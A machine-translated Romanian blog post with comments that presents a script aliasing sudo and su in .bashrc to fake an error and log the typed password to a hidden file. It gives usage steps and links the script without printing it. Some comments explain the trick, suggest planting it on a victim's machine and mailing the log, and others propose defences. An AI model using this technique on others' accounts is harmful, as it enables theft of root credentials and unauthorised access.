Obțineți parola ROOT

Am dat peste un Script pentru a schimba .bashrc creând un alias pentru „sudo” și „su”. nu înainte fără a face o copie de rezervă a fișierului pentru a-l restabili ulterior.

Ceea ce face este că trimite un mesaj de eroare atunci când se utilizează „sudo” sau „su” și captează parola într-un jurnal numit „.plog” care se află acasă.

Mod de utilizare

  1. Salvați scriptul
  2. Dă-i permisiuni de execuție.
  3. Rulați-l în terminal
  4. Închideți terminalul
  5. Aștepta.
  6. Apoi verificați fișierul .plog. Și trebuie să existe parola root sau a unui utilizator care se află în sudoers.

http://paste.desdelinux.net/4691

Bucurați-vă.


Lasă comentariul tău

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

*

*

  1. Responsabil pentru date: Miguel Ángel Gatón
  2. Scopul datelor: Control SPAM, gestionarea comentariilor.
  3. Legitimare: consimțământul dvs.
  4. Comunicarea datelor: datele nu vor fi comunicate terților decât prin obligație legală.
  5. Stocarea datelor: bază de date găzduită de Occentus Networks (UE)
  6. Drepturi: în orice moment vă puteți limita, recupera și șterge informațiile.

  1.   v3on el a spus

    pentru acest tip, este că securitatea fizică a echipei noastre nu trebuie neglijată

    1.    truko22 el a spus

      Așa este, dacă computerul este împrumutat pentru o clipă, trebuie să verificați pseudonimele 😀

  2.   Lolo el a spus

    Întrebare nevinovată:

    Cum modifică scriptul .bashrc al unui utilizator sudoer care nu este auto?

  3.   Blaire pascal el a spus

    Oo, îmi place foarte mult. Testarea.

  4.   pacoeloyo el a spus

    Deci securitatea și criptarea pe care le folosim în gnu / linux nu au valoare? Cred că nu este cazul, cine încearcă acest lucru ar trebui să comenteze rezultatele. De când am folosit acest sistem, am citit că nivelurile de criptare în Linux sunt foarte mari. Parolele sunt criptate folosind algoritmi de reducere criptografică unidirecțională și acum se dovedește că, cu un script simplu, criptarea este omisă. Îmi pare rău, dar nu cred.

    1.    @Jlcmux el a spus

      Dacă funcționează, uite. Ceea ce se întâmplă este că scriptul creează un alias în .bashrc cu sudo și su. Și când tastați su și / sau sudo. Citește mai întâi aliasul. nu comanda ca atare. deci, atunci când scrieți parola, o pune într-un fișier text normal. și apoi șterge aliasul și vă permite să utilizați sudo sau comun și actual. Adică, este ca un pishing. Nu înseamnă că ocolește criptarea. este o autentificare falsă.

      1.    pacoeloyo el a spus

        Bine, acum, dacă înțeleg, am fost deja surprins să trec peste această protecție la torrera .. Vă mulțumim că l-ați clarificat.

        1.    Kike el a spus

          Sigur, dar cel mai dificil lucru rămâne, să obțineți scriptul să fie strecurat în computerul victimei, să îl executați și apoi să colectați fișierul de la distanță sau să îl trimiteți la un e-mail. Acolo fiecare va trebui să-și folosească imaginația!

    2.    vreodată el a spus

      Ați exagerat mult pacoeloyo, cred. Acesta este un troian simplu, care cere utilizatorului să ocolească diferite măsuri de securitate și prezența locală a atacatorului. Asta există în orice sistem de operare.
      În ceea ce privește scriptul ... dacă nu mă înșel, majoritatea SUDO-urilor actuale se autentifică cu parola utilizatorului, nu cu parola root. Deci parola care ar fi obținută este cea a utilizatorului (prezentă în sudoers).
      În ceea ce priveşte

      1.    @Jlcmux el a spus

        este cu sudo sau su. De asemenea, dacă un utilizator poate folosi sudo, este pentru că se află în sudoers și are aceleași privilegii ca și root .. sau nu?

        1.    vreodată el a spus

          nu întotdeauna, depinde de configurația sudoers. Oricum, cel mai frecvent este că da, aveți acces complet.
          Ideea este că acțiunile executate folosind sudo sunt de obicei înregistrate

      2.    diazepam el a spus

        invocând pur și simplu „su” accesează contul root.

  5.   ps el a spus

    Acest lucru este foarte periculos dacă utilizați parole bune în medii de clasă sau de atelier partajate. Ei pot juca pentru tine. Ei bine, ar fi putut juca ...

    Nu este util să descoperi parolele unui necunoscut, dar cred că este suficientă o cunoștință.

    Și nu uitați, majoritatea își duplică parolele sau utilizează modele comune. Nu-i subestima niciodată. Dacă sunteți foarte ticăloși, desigur ...

  6.   ghermain el a spus

    Ei bine, nu mă încurc ... nu am nimic de ascuns, nici măcar întrebările finale de la examen ... și dacă am nevoie de o parolă o întreb ... și am fișierele pe un hard disk extern .. cu o copie de rezervă pe laptopul meu care rămâne pe House.
    Trebuie să căutăm simplitatea și practicitatea, astăzi sunt în viață, mâine nu știu ... trăiesc astăzi restul sunt ore suplimentare.

  7.   ferchmetal el a spus

    Îl voi ține cont, mulțumesc.

  8.   elynx el a spus

    Interesant!

  9.   Lolo el a spus

    Cum se copiază acest script în fișierul .bashrc al utilizatorului sudoer?

    Dacă aveți un cont pe computer, nu puteți intra în casa unui alt utilizator decât dacă aveți permisiunea și încă mă îndoiesc că puteți modifica fișierul .bashrc al victimei.

    Mă îndoiesc că va funcționa dacă utilizatorul sudoer nu este extrem de neglijent.

  10.   lex aleksandre el a spus

    Trebuie să fim foarte atenți la această vreme!

  11.   Marcos el a spus

    O întrebare, dacă nu am parola de root, cum pot acorda permisiunea de execuție a fișierului? Sau un utilizator normal funcționează?

    1.    @Jlcmux el a spus

      Clar. Permisiunile de executare nu sunt exclusive pentru root.

      1.    Alberto Aru el a spus

        AJUTOR!
        după ce am încercat-o, am șters .sudo_sd și nu găsesc nimic în google (sau alte motoare de căutare)

        1.    Alberto Aru el a spus

          Am șters .plog și a fost șters automat .sudo_sd și nu mă pot conecta ca root

          1.    Alberto Aru el a spus

            REZOLVAT COMENTATIV PE ALIASES

  12.   Card el a spus

    Dacă acest lucru funcționează pe un MAC, mă voi duce la un magazin Apple ... hei! dar doar puțin, nu într-un plan terorist 😉

  13.   Atheyus el a spus

    Intrare interesantă

    O îndoială

    Și dacă folosesc gksu sau echivalentul în kde

    De asemenea, captează parola

    În ceea ce priveşte

  14.   viata casca el a spus

    Executarea acestui script poate fi evitată acordând permisiunea de numai citire pentru .bashrc

  15.   Blazek el a spus

    Testat, funcționează, aunk are limitele sale. Înveți mereu lucruri noi în Linux.

  16.   Alberto Aru el a spus

    Cum pot reveni modificările odată efectuate? Am șters .plog și nu mă lasă să folosesc sudo:
    bash: /home/alberto/.sudo_sd: Fișierul sau directorul nu există

    1.    Alberto Aru el a spus

      REZOLVAT COMENTATIV PE ALIASES